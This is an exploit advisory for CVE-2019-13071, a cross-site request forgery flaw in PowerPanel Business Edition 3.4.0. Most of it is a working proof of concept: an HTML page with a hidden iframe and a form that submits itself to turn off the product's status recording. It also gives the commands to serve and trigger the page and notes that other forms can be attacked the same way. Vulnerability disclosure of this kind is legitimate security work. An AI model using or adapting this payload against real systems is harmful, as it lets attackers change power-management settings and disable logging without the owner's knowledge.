Share
# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request  
Forgery  
# Date: 7/9/2019  
# Exploit Author: Joey Lane  
# Vendor Homepage: https://www.cyberpowersystems.com  
# Version: 3.4.0  
# Tested on: Ubuntu 16.04  
# CVE : CVE-2019-13071  
# Reported to vendor on 5/25/2019, no acknowledgement.  
  
The Agent/Center component of PowerPanel Business Edition is vulnerable to  
cross site request forgery. This can be exploited by tricking an  
authenticated user into visiting a web page controlled by a malicious  
person.  
  
The following example uses CSRF to disable Status Recording under the Logs  
/ Settings page. Create a file named 'csrf.html' on a local workstation  
with the following contents:  
  
<iframe style="display:none" name="csrf-frame"></iframe>  
<div style="display: none;">  
<form method='POST' action='http://(A VALID HOST  
NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form">  
<input type='hidden' name='value(recordingEnable)' value='no'>  
<input type='hidden' name='value(recordingInterval)' value='10'>  
<input type='hidden' name='value(periodToRemoveRecord)' value='2'>  
<input type='hidden' name='value(clearAllStatusLogs)' value='no'>  
<input type='hidden' name='value(type)' value='records'>  
<input type='hidden' name='value(action)' value='Apply'>  
<input type='hidden' name='value(button)' value='Apply'>  
<input type='submit' value='submit'>  
</form>  
</div>  
<script>document.getElementById("csrf-form").submit()</script>  
  
Serve the file using python or any other web server:  
  
python -m SimpleHTTPServer 8000  
  
Visit the local page in a browser while logged into PowerPanel Business  
Edition:  
  
http://localhost:8000/csrf.html  
  
The hidden form is submitted in the background, and will disable Status  
Recording. This could be adapted to exploit other forms in the web  
application as well.